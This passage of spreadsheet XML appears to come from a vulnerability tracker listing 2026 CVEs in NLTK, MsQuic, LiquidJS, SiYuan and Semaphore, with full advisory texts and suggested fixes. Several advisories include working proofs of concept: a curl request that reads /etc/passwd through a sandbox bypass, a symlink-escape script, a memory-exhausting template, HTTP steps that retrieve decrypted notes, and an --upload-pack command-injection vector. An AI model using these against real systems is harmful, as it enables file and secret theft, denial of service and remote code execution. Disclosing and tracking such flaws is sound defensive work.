          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62384</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1030" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62385</t>
        </is>
      </c>
      <c r="D1030" s="5" t="inlineStr"/>
      <c r="E1030" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1030" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1030" s="5" t="inlineStr"/>
      <c r="H1030" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1030" s="5" t="inlineStr"/>
      <c r="J1030" s="5" t="inlineStr"/>
      <c r="K1030" s="5" t="inlineStr"/>
      <c r="L1030" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1030" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N1030" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1030" s="5" t="inlineStr"/>
      <c r="R1030" s="5" t="inlineStr"/>
      <c r="S1030" s="5" t="inlineStr">
        <is>
          <t>### Summary
Published `nltk==3.9.4` still contains several XML-reader entrypoints that build parser paths from caller-controlled selectors or trusted-looking index state without preserving the corpus-root boundary.
### Details
- **Vulnerability type:** Path traversal and trusted-root bypass
- **Affected component:** `FramenetCorpusReader.frame_by_name`, `FramenetCorpusReader.doc`, `FramenetCorpusReader.lu`, `NKJPCorpusReader.header`
- **Affected versions:** Published `3.9.4` reproduced. Current source `v3.10.0-rc2` acted as a negative control and blocked the same payloads.
- **Patched versions:** Patched in version 3.10.0, which includes the path-safety rejections seen in the release candidate.
- **Root cause:** Stable reader paths still construct raw XML filenames from unsafe selectors, poisoned index state, or unsafe file identifiers.
I confirmed four public stable entrypoints return parsed outside-root content: a parent-segment traversal frame name, a poisoned fulltext index filename, a poisoned LU id, and an unsafe NKJP header file identifier. Current source rejects the same payloads with explicit path-safety errors, which shows the bug is real but version-scoped to the published stable package.
### PoC
**Preconditions**
- The application exposes FrameNet or NKJP reader APIs while trusting NLTK to keep XML parsing inside a corpus root.
**Steps**
1. Create a minimal FrameNet or NKJP corpus root and place attacker-chosen XML files outside that root.
2. Feed unsafe selectors or poisoned index state into the relevant public stable `3.9.4` APIs.
3. Observe `frame_by_name`, `doc`, `lu(...).exemplars`, or `header` return parsed outside-root values.
4. Run the same payloads against current source and observe explicit path-safety rejections.
**Minimal reproducible excerpt**
```text
framenet_frame_definition FRAME_LEAK
framenet_doc_text DOC_LEAK
framenet_lu_text LU_LEAK
nkjp_header_title HEADER_LEAK
```
### Impact
Applications that process attacker-influenced FrameNet or NKJP corpus selectors or state can be made to parse XML outside the trusted corpus root through normal public reader responses.
### Remediation
Keep these reader paths on the same root-confinement model as `CorpusReader.open()` and `nltk.pathsec`. Reject unsafe path components before constructing filenames from frame names, document filenames, LU ids, or NKJP file identifiers.
### Resources
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1366-L1369
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1456-L1460
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1803-L1810
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/nkjp.py#L96-L103
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/nkjp.py#L251-L256
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/corpus/reader/framenet.py#L1388-L1399
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/corpus/reader/nkjp.py#L96-L128</t>
        </is>
      </c>
      <c r="T1030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62385</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1031" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62815</t>
        </is>
      </c>
      <c r="D1031" s="5" t="inlineStr"/>
      <c r="E1031" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1031" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1031" s="5" t="inlineStr"/>
      <c r="H1031" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I1031" s="5" t="inlineStr"/>
      <c r="J1031" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K1031" s="5" t="inlineStr"/>
      <c r="L1031" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.Native.Quic.MsQuic.OpenSSL, NuGet:Microsoft.Native.Quic.MsQuic.Schannel</t>
        </is>
      </c>
      <c r="M1031" s="5" t="inlineStr">
        <is>
          <t>2.4.19, 2.5.10</t>
        </is>
      </c>
      <c r="N1031" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1031" s="5" t="inlineStr"/>
      <c r="R1031" s="5" t="inlineStr"/>
      <c r="S1031" s="5" t="inlineStr">
        <is>
          <t># Summary
Use after free in Microsoft QUIC allows an unauthorized attacker to execute code over a network.
# Details
New network path creations and removals triggered by incoming packets can lead to a pointer invalidation.
## Patches
- Guard path promotion [e0f55b5](https://github.com/microsoft/msquic/commit/e0f55b5fdc9fff0b4465976d066ebd22fb7e2b3b)
# Impact
An unauthenticated attacker could exploit this vulnerability by sending a specially crafted packet to an affected service over the network. Successful exploitation could allow the attacker to execute code on the target system. No authentication or user interaction is required.</t>
        </is>
      </c>
      <c r="T1031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1032" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63312</t>
        </is>
      </c>
      <c r="D1032" s="5" t="inlineStr"/>
      <c r="E1032" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1032" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1032" s="5" t="inlineStr"/>
      <c r="H1032" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1032" s="5" t="inlineStr"/>
      <c r="J1032" s="5" t="inlineStr"/>
      <c r="K1032" s="5" t="inlineStr"/>
      <c r="L1032" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1032" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N1032" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1032" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1032" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1032" s="5" t="inlineStr"/>
      <c r="R1032" s="5" t="inlineStr"/>
      <c r="S1032" s="5" t="inlineStr">
        <is>
          <t>## Summary
Setting `nltk.pathsec.ENFORCE = True` is documented to sandbox all file access to allowed NLTK data directories and raise `PermissionError` on unauthorized access. However, `StreamBackedCorpusView` opens files via `builtins.open()` directly, bypassing `pathsec.validate_path()` entirely. An attacker who can influence the `fileid` argument can read arbitrary local files regardless of the `ENFORCE` setting.
## Details
`nltk/pathsec.py:274` defines the enforcement point:
```python
def open(file, mode="r", **kwargs):
    validate_path(file, context="pathsec.open")
    return builtins.open(file, mode=mode, **kwargs)
```
`StreamBackedCorpusView._open()` in `nltk/corpus/reader/util.py` bypasses this entirely for string paths:
```python
# line 171 — no validate_path() call
self._eofpos = os.stat(self._fileid).st_size
# line 208 — calls builtins.open directly
self._stream = open(self._fileid, "rb")
```
Also affected: `XMLCorpusView` and any corpus reader subclass that passes a raw string `fileid` to `StreamBackedCorpusView`.
## PoC
```python
# poc_server.py — StreamBackedCorpusView pathsec.ENFORCE bypass
from flask import Flask, request, jsonify
import nltk.pathsec as ps
from nltk.corpus.reader.util import StreamBackedCorpusView, read_line_block
# Strict mode enabled — expected to sandbox all file access
ps.ENFORCE = True
app = Flask(__name__)
@app.post("/read")
def read_file():
    fname = request.json.get("file")
    # fileid is user-controlled, passed directly to StreamBackedCorpusView
    # pathsec.ENFORCE = True is ignored — builtins.open() called internally
    view = StreamBackedCorpusView(fname, read_line_block, encoding="utf8")
    return jsonify({"file": fname, "content": view[0]})
app.run(host="0.0.0.0", port=8000)
```
Trigger:
```
curl -s -X POST http://localhost:8000/read \
  -H "Content-Type: application/json" \
  -d '{"file": "/etc/passwd"}'
```
Confirmed on latest stable NLTK. No privileges required.
## Impact
- **Type:** Arbitrary Local File Read / Security Control Bypass
- **CWE:** CWE-22, CWE-284
- **OWASP:** A01:2021 – Broken Access Control
Affects web apps, REST APIs, and multi-tenant NLP pipelines where user input influences the `fileid` passed to NLTK corpus readers. Sensitive targets include `/etc/passwd`, `/proc/self/environ` (may contain `AWS_SECRET_ACCESS_KEY`, `DATABASE_URL`, etc.), and application config files.
The core issue is that operators who explicitly set `ENFORCE = True` to harden production deployments are left with a **false security guarantee**.
**Suggested fix:** Replace `builtins.open()` and `os.stat()` in the string-path branch with `nltk.pathsec.open()` and `nltk.pathsec.validate_path()`.</t>
        </is>
      </c>
      <c r="T1032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63312</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1033" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69222</t>
        </is>
      </c>
      <c r="D1033" s="5" t="inlineStr"/>
      <c r="E1033" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1033" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1033" s="5" t="inlineStr"/>
      <c r="H1033" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1033" s="5" t="inlineStr"/>
      <c r="J1033" s="5" t="inlineStr"/>
      <c r="K1033" s="5" t="inlineStr"/>
      <c r="L1033" s="5" t="inlineStr">
        <is>
          <t>npm:liquidjs</t>
        </is>
      </c>
      <c r="M1033" s="5" t="inlineStr">
        <is>
          <t>10.27.2</t>
        </is>
      </c>
      <c r="N1033" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1033" s="5" t="inlineStr"/>
      <c r="R1033" s="5" t="inlineStr"/>
      <c r="S1033" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `join` filter (`src/filters/array.ts:8-13`) charges `memoryLimit` by array element **count**, not by the string length it produces, letting a template bypass a configured `memoryLimit` and allocate strings far past budget — bounded only by V8/process limits, not by `memoryLimit`.
### Details
```js
// src/filters/array.ts:8-13
export const join = argumentsToValue(function (this: FilterImpl, v: any[], arg: string) {
  const array = toArray(v)
  const sep = isNil(arg) ? ' ' : stringify(arg)
  const complexity = array.length * (1 + sep.length)   // element COUNT, not element sizes
  this.context.memoryLimit.use(complexity)
  return array.join(sep)                                // allocates sum(element lengths) + separators
})
```
`concat` (`array.ts:72`) is the enabler: it charges by element count too, but only copies references (cheap for both limiter and heap), so an array's element count can be doubled repeatedly at near-zero real cost. `join` is where the bug lives — it's the call that actually materializes all referenced content into one string, and its own charge (`array.length`) doesn't reflect that.
Same undercounting class as already-fixed `replace` (GHSA-mmg9-6m6j-jqqx), `replace_first` (GHSA-6q5m-63h6-5x4v), `date`/strftime (GHSA-hh27-hf48-9f5q) — `join` wasn't covered. Sibling `array_to_sentence_string` (`src/filters/string.ts:210`) has the identical defect.
### PoC
Live-reproduced against `liquidjs@10.27.1`, Node v24.3.0.
```javascript
const { Liquid } = require('liquidjs');
const engine = new Liquid({ memoryLimit: 1e7 }); // 10M-unit DoS defense
const E = 5000, DOUBLINGS = 13;
const chunk = 'a'.repeat(E);
let tpl = `{%- assign s = "${chunk}" -%}{%- assign a = s | split: "NOSUCHSEP" -%}`;
for (let i = 0; i &lt; DOUBLINGS; i++) tpl += `{%- assign a = a | concat: a -%}`; // 1 -&gt; 8192 elements
tpl += `{%- assign out = a | join: "" -%}{{ out | size }}`;
const len = Number(engine.renderSync(engine.parse(tpl))); // succeeds — should be blocked
console.log('output length:', len);  // output length: 40960000
```
Verified by binary-search on `memoryLimit`: render is **blocked at 29573**, **succeeds at 29574** — confirming total charge across `split`+13×`concat`+`join` is exactly 29,574 units (split 5000, concat 16382, join 8192). Output length: **40,960,000** — **1385x** the total charged, &gt;4x the configured 10,000,000-unit limit. Scaling `DOUBLINGS` grows output exponentially for linear charge growth, driving toward gigabytes and a `RangeError: Invalid string length` / V8 OOM crash.
### Impact
Any app rendering attacker-influenced templates with `memoryLimit` set (LiquidJS docs list it as covering "array concat/join/strftime") can have that control bypassed by one short template, forcing allocation well past budget up to a process crash. `split`/`concat` are correctly charged; the gap is `join`'s own accounting of its own output. (LiquidJS's security-model docs call these limits "cooperative safeguards, not strict isolation" — doesn't change that `join`'s charge is wrong relative to what it allocates.)</t>
        </is>
      </c>
      <c r="T1033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1034" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70626</t>
        </is>
      </c>
      <c r="D1034" s="5" t="inlineStr"/>
      <c r="E1034" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1034" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1034" s="5" t="inlineStr"/>
      <c r="H1034" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1034" s="5" t="inlineStr"/>
      <c r="J1034" s="5" t="inlineStr"/>
      <c r="K1034" s="5" t="inlineStr"/>
      <c r="L1034" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1034" s="5" t="inlineStr">
        <is>
          <t>3.9.4</t>
        </is>
      </c>
      <c r="N1034" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1034" s="5" t="inlineStr"/>
      <c r="R1034" s="5" t="inlineStr"/>
      <c r="S1034" s="5" t="inlineStr">
        <is>
          <t>### Summary
`nltk.corpus.reader.api.CorpusReader.open()` can be used to read files outside the intended corpus root via a symlink placed inside that root. Although NLTK blocks absolute paths and `..` traversal, the current boundary check is only lexical and does not account for symlink resolution. This leads to an arbitrary local file read / filesystem sandbox bypass for applications that rely on `CorpusReader` or `FileSystemPathPointer` to restrict file access.
### Details
The vulnerable flow is:
- [`nltk/corpus/reader/api.py:222`](/mnt/Data/my_brains/test/nltk/nltk/corpus/reader/api.py#L222)
  - `CorpusReader.open()` blocks absolute paths and `..`, then calls `self._root.join(file).open()`
- [`nltk/data.py:398`](/mnt/Data/my_brains/test/nltk/nltk/data.py#L398)
  - `FileSystemPathPointer.join()` joins the requested file ID and checks whether the resulting path still appears to remain under the configured root
The problem is that the check is based on the lexical path after `os.path.normpath()`, not on the resolved path after following symlinks.
Current behavior:
1. `CorpusReader.open()` rejects:
   - absolute paths
   - `..` path traversal
2. `FileSystemPathPointer.join()` computes:
   - `joined = os.path.normpath(os.path.join(self._path, fileid))`
   - `root = os.path.normpath(self._path)`
3. It allows the access if `joined` starts with `root`
This misses the case where a path stays inside the root lexically, but resolves outside the root via a symlink already present under the allowed directory.
Example:
```text
JOINED=/tmp/nltk-root/link/secret.txt
REALPATH=/tmp/outside/secret.txt
```
`JOINED` still appears to be inside the root, but `REALPATH` is outside it.
This is distinct from simple `../` traversal:
- the file ID is not absolute
- the file ID does not contain `..`
- the escape only happens after filesystem resolution of a symlink under the allowed root
### PoC
Reproduced in an isolated Docker sandbox using the local `nltk` clone.
Minimal Python PoC:
```python
import os
import tempfile
from nltk.corpus.reader.api import CorpusReader
root = tempfile.mkdtemp(prefix="nltk-root-")
outside_dir = tempfile.mkdtemp(prefix="nltk-out-")
outside_file = os.path.join(outside_dir, "secret.txt")
with open(outside_file, "w") as f:
    f.write("secret-data")
os.symlink(outside_dir, os.path.join(root, "link"))
corpus = CorpusReader(root, ["link/secret.txt"])
with corpus.open("link/secret.txt") as f:
    print(f.read())
```
Observed result:
```text
secret-data
```
Docker re-test output:
```text
ROOT=/tmp/nltk-root-jjxay3if
OUTSIDE_DIR=/tmp/nltk-out-1kef36e0
JOINED=/tmp/nltk-root-jjxay3if/link/secret.txt
REALPATH=/tmp/nltk-out-1kef36e0/secret.txt
READ_OK=secret-data
INSIDE_ROOT=True
REAL_INSIDE_ROOT=False
```
Additional impact validation using a system file:
```text
ROOT=/tmp/nltk-root-_h5x4m19
JOINED=/tmp/nltk-root-_h5x4m19/hostfile
REALPATH=/etc/hostname
HOSTNAME_READ=48dafb244af3
INSIDE_ROOT=True
REAL_INSIDE_ROOT=False
```
This shows that the issue is not limited to attacker-created files outside the root; it can also read existing system files that are readable by the application user.
### Impact
This is an arbitrary local file read / symlink escape issue.
Who is impacted:
- applications that accept attacker-controlled corpus directories, extracted datasets, or package contents
- applications that rely on NLTK corpus readers as a trust boundary for file access
- any deployment where an attacker can place or influence files inside the allowed corpus root
Practical impact includes disclosure of:
- application secrets stored on disk
- local configuration files
- private datasets
- process-exposed files such as `/proc/self/environ`
- system files readable by the running user
The issue is best described as a filesystem sandbox bypass caused by improper link resolution before file access.</t>
        </is>
      </c>
      <c r="T1034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70626</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1035" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72789</t>
        </is>
      </c>
      <c r="D1035" s="5" t="inlineStr"/>
      <c r="E1035" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1035" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1035" s="5" t="inlineStr"/>
      <c r="H1035" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1035" s="5" t="inlineStr"/>
      <c r="J1035" s="5" t="inlineStr"/>
      <c r="K1035" s="5" t="inlineStr"/>
      <c r="L1035" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/siyuan-note/siyuan/kernel</t>
        </is>
      </c>
      <c r="M1035" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260726020813-a25c2dd06aae</t>
        </is>
      </c>
      <c r="N1035" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1035" s="5" t="inlineStr"/>
      <c r="R1035" s="5" t="inlineStr"/>
      <c r="S1035" s="5" t="inlineStr">
        <is>
          <t>**CVE:** This vulnerability corresponds to [CVE-2026-72789](https://nvd.nist.gov/vuln/detail/CVE-2026-72789).
### Summary
`publishAccess.json` is an opt-out list. The publish gate returns *accessible* for anything not explicitly listed in it. Encrypted notebooks are never written into that file, because only the administrator-gated `setPublishAccess` writes it and no part of the encryption subsystem does. Consequently every encrypted notebook is publish-accessible as far as the gate is concerned.
While an encrypted notebook is unlocked, an anonymous reader in publish mode can list it, enumerate its documents, and retrieve their fully decrypted content. No key material, no password, and no cracking is involved. The kernel decrypts the data and serves it because the authorization layer never asks whether the notebook is encrypted.
This is reported as a defect in the gate rather than in any individual handler. Endpoints that were previously reviewed and found to apply the correct checks do apply them. The checks return true.
### Details
**The gate defaults to accessible.** `CheckPathAccessableByPublishIgnore(box, path, ignore)` iterates the ignore list and returns false only on a match:
```go
for _, item := range publishIgnore {
    if item.ID == box || strings.Contains(path, item.ID) {
        return false
    }
}
return true   // unlisted means accessible
```
**Encrypted notebooks are never listed.** `publishAccess.json` is written only by `setPublishAccess` (`kernel/api/router.go:169`), which carries `CheckAdminRole` and `CheckReadonly`. Nothing in `crypto.go`, `encrypted_ops.go` or `notebook_crypto.go` writes to it. An administrator would have to manually add each encrypted notebook to the ignore list to protect it, and nothing in the product prompts or documents that.
**Neither core gate rejects them.** On both `eef105683` and `v3.7.4-alpha.1`:
```go
func checkBlockTreeAccessableByPublishAccess(...) bool {
    return CheckPathAccessableByPublishIgnore(bt.BoxID, bt.Path, publishIgnore) &amp;&amp;
           (password == "" || CheckPublishAuthCookie(c, passwordID, password))
}
```
For an encrypted notebook the first term is true because it is unlisted, and the second is true because encrypted notebooks carry no publish password. The conjunction returns true.
`IsEncryptedBox` does not appear in `kernel/model/publish_access.go` at all on master. On the development branch it appears once, inside `parseAttributeViewForPublishAccess`, where it routes *into* encrypted boxes rather than excluding them. The publish authorization layer has no concept of an encrypted notebook.
**The chain.** Verified on the development branch, which is the harder target because the block-metadata, attribute-view, path-resolution and encrypted-notebook-status fixes have all landed there.
1. `lsNotebooks` calls `ListNotebooks()`, which includes encrypted notebooks and reports `Encrypted: boxConf.Encrypted` without filtering on it. The reader filter skips only notebooks that are `Closed` or publish-invisible. An unlocked encrypted notebook is neither, so it is returned to an anonymous reader together with its identifier.
2. `listDocsByPath{notebook: &lt;encrypted box id&gt;, path: "/"}` applies only `CheckPathAccessableByPublishIgnore`, which passes, returning the document identifiers and titles inside the encrypted notebook.
3. `getDoc` routes to `GetDocInBox(...)`, after which `FilterContentByPublishAccess(...)` returns the content unmodified because the box is unlisted. The response is the fully decrypted document. `getBlockKramdown` reaches `GetBlockKramdownInBox` for the same result in Markdown.
Handlers reach the decrypted store through `encryptedNotebookFromArg(arg)` on a client-supplied notebook argument. This function predates the current release and is not a recent addition.
**The precondition is the unlock window.** `GetBlockTreeInBox` returns nil while a notebook is locked, treating it as nonexistent, and non-nil once unlocked. So the exposure is bounded to the period during which the legitimate user has the notebook open, which is precisely the period in which they are working in it. No action by the attacker triggers or extends that window, but no unusual condition is required either.
**On endpoints previously assessed as correctly gated.** `getBlockDOM` and `getBlockKramdown` apply password and visibility checks. `exportPreview` applies `FilterContentByPublishAccess`. Those assessments are accurate and this report does not contradict them. The checks execute and return true, because the visibility term resolves to accessible for an unlisted box and the password term is vacuous for a notebook that has no publish password. Patching any individual handler would not change that result.
### Proof of Concept
Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. An encrypted notebook that is currently unlocked by the legitimate user.
Step 1, obtain the encrypted notebook's identifier:
```
POST http://127.0.0.1:6808/api/notebook/lsNotebooks
{}
→ 200. The list includes the encrypted notebook, with encrypted: true and its id.
```
Step 2, enumerate its documents:
```
POST http://127.0.0.1:6808/api/filetree/listDocsByPath
{"notebook":"&lt;encrypted box id&gt;","path":"/"}
→ 200, document identifiers and titles from inside the encrypted notebook
```
Step 3, retrieve decrypted content:
```
POST http://127.0.0.1:6808/api/filetree/getDoc
{"id":"&lt;document id from step 2&gt;"}
→ 200, the fully decrypted document
```
`getBlockKramdown` returns the same content as decrypted Markdown. Repeating step 3 while the notebook is locked returns not-found, which confirms the unlock window is the only thing standing between an anonymous reader and the plaintext.
### Impact
The confidentiality guarantee of the encrypted-notebook feature is defeated against a remote, unauthenticated attacker for as long as the notebook is unlocked. A user who encrypts a notebook is expressing that its contents should be protected beyond the ordinary publish boundary. The publish gate does not recognise that intent, and instead treats the notebook as publicly readable because nobody added it to an opt-out list that the encryption feature does not write to.
The exposure is full document content rather than metadata, and it applies to every document in the notebook. It requires no key material, no password, no offline work and no interaction with the encryption subsystem at all.
### Suggested fix
Fail closed on encryption, independently of `publishAccess.json`:
```go
if IsEncryptedBox(bt.BoxID) {
    return false
}
```
in both `checkBlockTreeAccessableByPublishAccess` and `CheckBlockTreeMetadataAccessableByPublishAccess`, and exclude encrypted notebooks from `lsNotebooks` and `listDocsByPath` for read-only roles.
The broader point is the default. An opt-out authorization list means every future notebook type, storage backend or content class is publicly accessible until somebody remembers to add it. Encrypted notebooks are the case where that default is most clearly wrong, but they are unlikely to be the only one.</t>
        </is>
      </c>
      <c r="T1035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72789</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1036" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73294</t>
        </is>
      </c>
      <c r="D1036" s="5" t="inlineStr"/>
      <c r="E1036" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1036" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1036" s="5" t="inlineStr"/>
      <c r="H1036" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1036" s="5" t="inlineStr"/>
      <c r="J1036" s="5" t="inlineStr"/>
      <c r="K1036" s="5" t="inlineStr"/>
      <c r="L1036" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/semaphoreui/semaphore</t>
        </is>
      </c>
      <c r="M1036" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260704181911-7e8a9434bd81</t>
        </is>
      </c>
      <c r="N1036" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1036" s="5" t="inlineStr"/>
      <c r="R1036" s="5" t="inlineStr"/>
      <c r="S1036" s="5" t="inlineStr">
        <is>
          <t># Summary
An OS command injection in repository git_url handling lets any user holding the Manager or Owner role on any project (the normal project-collaborator roles) achieve remote code execution on the Semaphore server host. Using git's --upload-pack=&lt;cmd&gt; option, an attacker runs arbitrary commands. The command executes inside the main Semaphore server process (via the schedule commit-hash poller), so it runs even when jobs are configured for remote runners — bypassing runner isolation and exposing the master encryption key and every project's secrets. Reproducible on a default install (git_client: cmd_git); no non-default configuration is required.
# Details
The repository git_url is attacker-controlled (HTTP body) and reaches exec.Command("git", ...) unvalidated. Two missing controls cause this:
1. git_url is never validated against option injection.
Repository.Validate() (db/Repository.go, ~lines 138–156) validates the branch via ValidateGitBranch (db/git_branch.go, which rejects a leading -), but performs no equivalent check on GitURL (only "non-empty"). ValidateRepository (db/Store.go, ~802–806) only checks the SSH key. CreateRepository (db/sql/repository.go, ~76–95) stores it verbatim. Because --upload-pack=... has no scheme:// and no leading /, GetType() (db/Repository.go, ~113–136) classifies it as RepositorySSH and GetGitURL(false) (~72–111) returns it raw/unchanged.
2. The git command is built with no -- separator.
CmdGitClient.GetLastRemoteCommitHash (db_lib/CmdGitClient.go, ~169–185) calls:
c.output(r, GitRepositoryTmpPath, "ls-remote",
           r.Repository.GetGitURL(false),   // attacker-controlled
           r.Repository.GitBranch)          // "master"
output (~79–93) → makeCmd (~21–60): exec.Command("git") (line ~27), cmd.Args = append(cmd.Args, args...) (line ~55). The resulting argv has no --:
["git", "ls-remote", "--upload-pack=&lt;cmd&gt;;true", "master"]
git parses --upload-pack=... as an option; master becomes the (local-transport) repository operand; git then executes the upload-pack value through a shell (sh -c "&lt;cmd&gt; 'master'"), running &lt;cmd&gt;. This is intended git behavior — the fault is Semaphore passing untrusted data as argv. (The command runs even though git subsequently prints fatal: Could not read from remote repository and exits 128, and even though master is not a real path.)
### Trigger — it fires in the server process.
